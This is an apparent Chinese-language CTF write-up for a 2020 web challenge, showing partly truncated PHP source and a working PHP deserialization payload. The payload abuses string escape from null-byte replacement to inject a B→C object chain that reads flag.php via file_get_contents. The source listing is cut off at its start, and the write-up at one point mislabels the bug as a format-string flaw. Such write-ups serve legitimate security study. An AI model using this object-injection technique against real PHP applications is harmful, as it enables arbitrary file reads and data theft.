2020安恒四月赛-Web-unserialize

查看源码:
 

 username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}


$a = new A($_GET['a'],$_GET['b']);
echo read(write(serialize($a)));
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作
$b = unserialize(read(write(serialize($a))));
echo '
'.$b->password; ?>

 

可以猜测是格式化字符串漏洞

这里有个小问题

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

\0\0\0转换位chr(0).*.chr(0)这里,会导致字符串逃逸

具体点击这里

通过和队友的讨论,构造出以下payload:

a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=c";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}

你可能感兴趣的:(WEB,CTF)